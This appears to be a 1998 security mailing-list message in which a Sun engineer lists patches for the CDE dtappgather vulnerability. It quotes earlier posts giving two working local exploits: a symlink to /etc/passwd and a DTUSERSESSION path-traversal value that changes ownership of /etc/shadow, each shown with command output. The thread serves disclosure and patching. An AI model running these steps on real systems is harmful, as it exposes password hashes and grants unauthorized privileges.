Re: /usr/dt/bin/dtappgather exploit

Steven Goldberg - SE - Seattle WA (steven.goldberg@West.Sun.COM)
Wed, 25 Feb 1998 10:59:38 -0800

Hi,

Sun has published the following patches to address this
vulnerability:

patches 104497 CDE 1.0.1: dtappgather patch
patches 104498 CDE 1.0.2: dtappgather patch
patches 104499 CDE 1.0.1_x86: dtappgather patch
patches 104500 CDE 1.0.2_x86: dtappgather patch
patches 105837 CDE 1.2: dtappgather Patch
patches 105838 CDE 1.2_x86: dtappgather Patch

thanks,

Steve

--------------

> Date: Tue, 24 Feb 1998 20:30:20 +0100
> From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
> Subject: Re: /usr/dt/bin/dtappgather exploit
> MIME-Version: 1.0
> Content-Transfer-Encoding: 7BIT
>
> >
> > I suppose you have learnt about CERT's advisory on dtappgather
> > program. Well, here's the exploit:
> >
> > nigg0r@host% ls -l /etc/passwd
> > -r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd
> > nigg0r@host% ln -s /etc/passwd
/var/dt/appconfig/appmanager/generic-display-0
> > nigg0r@host% dtappgather
>
> the exploit is much simpler than that.
> hey, it's even documented on the man page :-)
>
> Simply
>
> $ id
> uid=6969(foo) gid=666(bar)
> $ ls -l /etc/shadow
> -r-------- 1 root sys 234 Nov 7 1999 /etc/shadow
> $ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather
> $ ls -l /etc/shadow
> -r-xr-xr-x 1 foo bar 234 Nov 7 1999 /etc/shadow
>
>
> Anyway, your exploit has an advantage: it works (at least,
> in solaris 2.5), even after patching CDE according to CERT
> advisory.
> Solaris 2.6 seems to have the right permisions:
>
> /var/dt -> rwxr-xr-x
> /var/dt/appconfig -> rwxr-xr-x
> /var/dt/tmp -> rwxrwxrwt
>
> --
> J.A. Gutierrez So be easy and free
> when you're drinking with me
> I'm a man you don't meet every day
> finger me for PGP (the pogues)